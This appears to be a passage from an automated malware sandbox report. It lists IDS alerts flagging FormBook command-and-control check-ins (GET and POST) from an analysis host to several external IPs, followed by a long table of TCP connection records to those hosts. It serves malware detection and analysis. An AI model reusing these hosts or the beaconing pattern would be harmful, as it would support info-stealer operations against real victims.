                                                                      2024-11-20T09:24:43.602677+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050004118.107.250.10380TCP
                                                                      2024-11-20T09:24:49.431121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050005209.74.77.10980TCP
                                                                      2024-11-20T09:24:51.957863+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050006209.74.77.10980TCP
                                                                      2024-11-20T09:24:54.511773+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050007209.74.77.10980TCP
                                                                      2024-11-20T09:24:57.083907+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050008209.74.77.10980TCP
                                                                      2024-11-20T09:24:57.083907+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050008209.74.77.10980TCP
                                                                      2024-11-20T09:25:02.842935+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050009188.114.96.380TCP
                                                                      2024-11-20T09:25:05.415107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050010188.114.96.380TCP
                                                                      2024-11-20T09:25:07.927701+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050011188.114.96.380TCP
                                                                      2024-11-20T09:25:10.505272+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050012188.114.96.380TCP
                                                                      2024-11-20T09:25:10.505272+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050012188.114.96.380TCP
                                                                      2024-11-20T09:25:17.778747+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050013194.245.148.18980TCP
                                                                      2024-11-20T09:25:20.321559+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050014194.245.148.18980TCP
                                                                      2024-11-20T09:25:22.867338+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050015194.245.148.18980TCP
                                                                      2024-11-20T09:25:25.416699+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050016194.245.148.18980TCP
                                                                      2024-11-20T09:25:25.416699+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050016194.245.148.18980TCP
                                                                      2024-11-20T09:25:31.061041+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050017199.59.243.22780TCP
                                                                      2024-11-20T09:25:33.612403+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050018199.59.243.22780TCP
                                                                      2024-11-20T09:25:37.379541+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050019199.59.243.22780TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 20, 2024 09:22:54.615077019 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:54.622095108 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:22:54.622237921 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:54.631941080 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:54.636826992 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:22:55.944574118 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:22:55.944843054 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:22:55.944955111 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:55.945255995 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:22:55.945311069 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:55.948215961 CET4984780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:22:55.954719067 CET8049847188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:23:12.734633923 CET4996180192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:12.744164944 CET804996123.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:12.744304895 CET4996180192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:12.760330915 CET4996180192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:12.765171051 CET804996123.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:13.100318909 CET804996123.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:13.101181984 CET4996180192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:14.270031929 CET4996180192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:14.276576042 CET804996123.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:15.288891077 CET4997780192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:15.296773911 CET804997723.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:15.298981905 CET4997780192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:15.314382076 CET4997780192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:15.321952105 CET804997723.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:15.654606104 CET804997723.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:15.654758930 CET4997780192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:16.817131042 CET4997780192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:16.822491884 CET804997723.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:17.835656881 CET4997880192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:17.842272043 CET804997823.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:17.842475891 CET4997880192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:17.856843948 CET4997880192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:17.861933947 CET804997823.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:17.861975908 CET804997823.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:18.201672077 CET804997823.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:18.201776981 CET4997880192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:19.363795042 CET4997880192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:19.368699074 CET804997823.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:20.383347988 CET4997980192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:20.388221025 CET804997923.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:20.388314962 CET4997980192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:20.397167921 CET4997980192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:20.405914068 CET804997923.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:20.755884886 CET804997923.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:20.756097078 CET4997980192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:20.756942034 CET4997980192.168.2.1023.167.152.41
                                                                      Nov 20, 2024 09:23:20.764127970 CET804997923.167.152.41192.168.2.10
                                                                      Nov 20, 2024 09:23:25.815763950 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:25.820791960 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:25.820894957 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:25.835645914 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:25.840503931 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444169998 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444343090 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444375038 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444406033 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:26.444842100 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444876909 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444905996 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:26.444910049 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444953918 CET804998166.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:26.444966078 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:26.445008039 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:27.348275900 CET4998180192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.366799116 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.373056889 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.373162985 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.387253046 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.392962933 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.977950096 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.977981091 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.977999926 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.978111982 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.978677988 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.978702068 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.978751898 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:28.979187012 CET804998266.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:28.979240894 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:29.895893097 CET4998280192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:30.913681030 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:30.918812990 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:30.918991089 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:30.933165073 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:30.938560009 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:30.938618898 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531133890 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531155109 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531167030 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531234980 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:31.531411886 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531425953 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.531455040 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:31.542376995 CET804998366.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:31.542467117 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:32.442009926 CET4998380192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:33.468003035 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:33.472996950 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:33.473159075 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:33.481877089 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:33.486809969 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156001091 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156147003 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156158924 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156188011 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156207085 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156219959 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156224012 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.156230927 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156255960 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.156364918 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.156420946 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156435013 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156447887 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:34.156464100 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.156500101 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.160979033 CET4998480192.168.2.1066.29.132.194
                                                                      Nov 20, 2024 09:23:34.169207096 CET804998466.29.132.194192.168.2.10
                                                                      Nov 20, 2024 09:23:39.862950087 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:39.870692968 CET8049985202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:39.870795012 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:39.885498047 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:39.890651941 CET8049985202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:40.821815968 CET8049985202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:40.822134972 CET8049985202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:40.822235107 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:40.822622061 CET8049985202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:40.822714090 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:41.395184040 CET4998580192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:42.413764954 CET4998680192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:42.418922901 CET8049986202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:42.419028997 CET4998680192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:42.432723999 CET4998680192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:42.438982964 CET8049986202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:43.374948978 CET8049986202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:43.375422955 CET8049986202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:43.375437975 CET8049986202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:43.375631094 CET4998680192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:43.943821907 CET4998680192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:44.960473061 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:44.966564894 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:44.966753960 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:44.979999065 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:44.990020990 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:44.990065098 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:45.900249004 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:45.900316954 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:45.900366068 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:45.900424957 CET8049987202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:45.900471926 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:46.494824886 CET4998780192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:47.507538080 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:47.512775898 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:47.512867928 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:47.522109985 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:47.527286053 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:48.478888988 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:48.478913069 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:48.478930950 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:48.479087114 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:48.479137897 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:48.481606960 CET4998880192.168.2.10202.92.5.23
                                                                      Nov 20, 2024 09:23:48.489974976 CET8049988202.92.5.23192.168.2.10
                                                                      Nov 20, 2024 09:23:53.643879890 CET4998980192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:53.648948908 CET8049989194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:53.649072886 CET4998980192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:53.662223101 CET4998980192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:53.667155981 CET8049989194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:54.162729979 CET8049989194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:54.162880898 CET8049989194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:54.162946939 CET4998980192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:55.176402092 CET4998980192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:56.194850922 CET4999080192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:56.199866056 CET8049990194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:56.200063944 CET4999080192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:56.214131117 CET4999080192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:56.218975067 CET8049990194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:56.721313953 CET8049990194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:56.721498966 CET8049990194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:56.721604109 CET4999080192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:57.723279953 CET4999080192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:58.742038965 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:58.748330116 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:58.748444080 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:58.763293982 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:23:58.768213987 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:58.768354893 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.261960983 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.261984110 CET8049991194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:23:59.262057066 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:00.270240068 CET4999180192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.314515114 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.319720984 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.319854975 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.329334021 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.334423065 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853827000 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853849888 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.853861094 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:01.854135036 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.856889009 CET4999280192.168.2.10194.195.220.41
                                                                      Nov 20, 2024 09:24:01.861792088 CET8049992194.195.220.41192.168.2.10
                                                                      Nov 20, 2024 09:24:07.648355007 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.654073000 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:07.654187918 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.672748089 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:07.678847075 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523195028 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523250103 CET8049993103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:08.523389101 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:09.178334951 CET4999380192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.195574045 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.200712919 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:10.200874090 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.219264984 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:10.224102020 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079086065 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079201937 CET8049994103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:11.079278946 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:11.723412037 CET4999480192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.742249966 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.747397900 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:12.747502089 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.761512041 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:12.766612053 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:12.766637087 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633373022 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633392096 CET8049995103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:13.633466959 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:14.270304918 CET4999580192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.288923025 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.293751001 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:15.293857098 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.302953959 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:15.310801983 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165601015 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165615082 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:16.165791988 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:16.169702053 CET4999680192.168.2.10103.230.159.86
                                                                      Nov 20, 2024 09:24:16.174634933 CET8049996103.230.159.86192.168.2.10
                                                                      Nov 20, 2024 09:24:21.224008083 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.229523897 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.229624033 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.241427898 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.247159004 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911703110 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911828995 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911912918 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:21.911935091 CET8049997188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:21.911979914 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:22.754789114 CET4999780192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.773471117 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.781034946 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:23.781166077 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.795907021 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:23.803224087 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418405056 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418519020 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418548107 CET8049998188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:24.418704987 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:24.418704987 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:25.301655054 CET4999880192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.321312904 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.345156908 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.345345974 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.367635012 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:26.373112917 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.373127937 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987242937 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987265110 CET8049999188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:26.987576008 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:27.880261898 CET4999980192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.898072004 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.903081894 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:28.903187990 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.911557913 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:28.917720079 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.561872005 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.562303066 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:29.562489033 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:29.564882994 CET5000080192.168.2.10188.114.97.3
                                                                      Nov 20, 2024 09:24:29.570100069 CET8050000188.114.97.3192.168.2.10
                                                                      Nov 20, 2024 09:24:34.980343103 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:34.985496044 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:34.987134933 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:35.067323923 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:35.076626062 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861618996 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861738920 CET8050001118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:35.861835957 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:36.582813025 CET5000180192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.602508068 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.607412100 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:37.607614040 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.623658895 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:37.628582001 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.485940933 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.485963106 CET8050002118.107.250.103192.168.2.10
                                                                      Nov 20, 2024 09:24:38.486166954 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:39.129719973 CET5000280192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.148696899 CET5000380192.168.2.10118.107.250.103
                                                                      Nov 20, 2024 09:24:40.153656960 CET8050003118.107.250.103192.168.2.10
